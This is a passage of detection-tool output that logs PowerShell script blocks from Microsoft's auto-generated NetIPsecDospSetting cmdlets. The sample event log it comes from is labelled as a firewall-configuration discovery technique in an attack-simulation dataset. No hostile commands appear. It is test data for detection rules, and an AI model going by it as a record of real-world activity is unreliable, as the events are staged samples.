[Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [System.Management.Automation.WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [System.Management.Automation.WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else {",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.082 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall 